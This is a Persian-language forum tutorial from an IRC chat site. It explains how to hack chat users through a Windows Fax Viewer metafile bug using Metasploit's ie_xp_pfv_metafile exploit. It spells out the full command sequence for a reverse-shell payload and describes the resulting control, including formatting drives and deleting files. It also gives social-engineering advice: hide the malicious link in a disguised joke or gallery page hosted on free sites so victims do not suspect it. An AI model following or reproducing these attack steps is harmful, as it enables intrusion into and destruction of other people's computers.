هک از طریق چت بدون ازسال فایل در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت Metasploit framework-2.5 - لینک آموزش کار با آن توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن بزنید set PAYLOAD win32_reverse و بعد ان بزنید set HTTPHOST 217.216.30.40 و بعد آن بزنید set LHOST 217.216.30.40 و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید - لینک اموزش ارسال فایل در shell با tftp چون قربانی ممکن است به لینک شما شک کند و چون اینک ip شما است روی ان کلیک نکند .شما می توانید یک صفحه ی html از یک سایت به طور مثال یک صفحه از یک سایت .گالری عکس . جک و ... را save کنید و آن را با note pad باز کرده و کد زیر را در چند خط قبل انتهای آن past کنید توجه داشته باشید که این کد لینک http:/217.216.30.40:8080 را به طور مخفی علاوه بر صفحه ی نمایش داده شده باز می کند . شما می بایستی ip خود را جایگزین http://217.216.30.40 کنید و در نهایت این صفحه ی save شده را مثلآ با نام joke.htm روی یک هاست free مثل persiangig.com . 20m.com . tripod.com اپلود کنید و لینک آن را به قربانی دهید بایستی در هر بار تغیر ip و اتصال مجدد به اینترت .علاوه بر انجام کارهای metasploit این file را نیز جهت معرفی ip جدید ویرایش کنید |
ارسال شده در مورخه : جمعه، 12 اسفند ماه ، 1384 توسط irchatan |
|
|
|
|
|
|
![]() |
![]() |
کلیه حقوق مربوط به سایت ایرچتان می باشد. و در هنگام نوشتن مقاله یا ذکر برنامه یا عکس و.. از این سایت ذکر منبع الزامی است
Copyright © 2003 . All Rights Reserved |